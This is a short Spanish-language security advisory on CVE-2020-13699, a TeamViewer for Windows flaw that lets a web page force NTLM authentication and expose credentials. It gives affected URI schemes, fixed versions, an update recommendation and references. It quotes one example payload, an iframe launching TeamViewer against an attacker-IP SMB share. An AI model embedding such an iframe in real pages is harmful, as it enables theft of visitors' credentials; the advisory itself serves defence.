Vulnerabilidad de criticidad alta en TeamViewer para escritorio Windows
ANÁLISIS
La vulnerabilidad que ha sido catalogada como CVE-2020-13699, y cuenta con un CVSS3 de 8.8[1], permitiría a un atacante lanzar a ejecución TeamViewer con parámetros arbitrarios y forzar el envío de una solicitud de autenticación con NTLM que podría posteriormente derivar en el robo de credenciales.
La vulnerabilidad está presente en teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. Ha sido resuelta para las versiones 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.
Para explotar la vulnerabilidad el atacante tan solo tiene que incrustar un elemento "iframe" en una página web (<iframe src='teamviewer10: --play \attacker-IPsharefake.tvs'>). Una vez la víctima accede a este enlace, el cliente de escritorio Windows de TeamViewer arrancará abriendo también un SMB share.[3][4]
El proveedor ya ha publicado una actualización que permite solventar la vulnerabilidad.
RECOMENDACIONES
Se recomienda aplicar la solución publicada por el proveedor, actualizando a la versión más reciente que solvente la vulnerabilidad [1]
REFERENCIAS
[1]https://nvd.nist.gov/vuln/detail/CVE-2020-13699
[2]https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13699
[3]https://thehackernews.com/2020/08/teamviewer-password-hacking.html
[4]https://jeffs.sh/CVEs/CVE-2020-13699.txt
[5]https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448#